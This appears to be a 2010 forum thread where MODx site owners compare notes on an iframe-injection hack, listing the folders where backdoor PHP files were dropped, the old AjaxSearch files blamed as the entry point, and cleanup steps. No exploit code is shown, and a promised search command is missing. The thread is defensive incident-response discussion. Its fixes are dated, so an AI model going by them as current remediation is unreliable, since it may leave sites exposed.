infected by iframe hack :(

I have just obtained the script used for injection, if you have been infected please check the following folders for backdoor files.

’assets/media/’,
’assets/flash/’,
’assets/docs/’,
’assets/modules/docmanager/’
’assets/snippets/ajaxSearch/’

The remote script chooses a folder above at random to drop the back door, it is also touching this file as well.

manager/includes/protect.inc.php

From what I have checked it is also not affecting the file date / time stamp.

Thanks Aaron

Great find Onesmarthost just what we needed.

found /www/assets/docs/faq_f.php

with some unpacking code.

Ive removed the ajax search snippet all together, although i was under the assumption i had always been up to date - must have been a remnant file

No problem, I’m currently going to be advising my customers to remove index-ajax.php and /assets/snippets/ajaxSearch if they are not using it.

I suspect in the past users are uploading new MODx installs but these files are just being left behind (I could be wrong).

Aaron

Quote from: Onesmarthost at Aug 18, 2010, 08:33 AM

No problem, I’m currently going to be advising my customers to remove index-ajax.php and /assets/snippets/ajaxSearch if they are not using it.

I suspect in the past users are uploading new MODx installs but these files are just being left behind (I could be wrong).

Aaron

i think your spot on.

good point with index-ajax.php

my cxs logs did indicate some post calls being made to some index file which could explain index-ajax.php

Thanks, Aaron, your discovery is quite helpful but the fix is incomplete. Many of us use ajaxsearch in our websites. Removing it is only a stopgap. I’m hoping to see a fix PDQ.

Hi Puffin,

Sorry I should have mentioned better.

Basically earlier versions of ajax-search had an exploit which were patched in later versions of MODx however some of the old ajax-search files were called

(1) ajax-search.php, ajax.php (old versions)

The new versions of AJax-Search had different file names so basically when users upgrade MODx these (1) files never got removed.

If anyone uses Ajax-Search just delete your existing assets/snippets/ajaxsearch folder then download the latest ajaxsearch 1.90

http://modxcms.com/extras/package/?package=8

And install this as it’s fully patched and comes with the latest version of MODx deleting the old folder first just ensures you are not carry across any of the old files on your new version install.

Aaron

Got it and thanks for explaining.

If you have SSH access, you can use:



to find the file that gets placed in your assets folder. This find command will find files that look like help_y.php or middle_h.php. Just run this command from the web root and it will find it (and anything else that might match).

James

The files i seen contained _1 to 9.

I think the files the exploit drops is dependant on the hacker as they just most likely change the random file name range.

This one hit me as well. I found the eval code in document.parser.class.inc but hadnt found the others. Thanks guys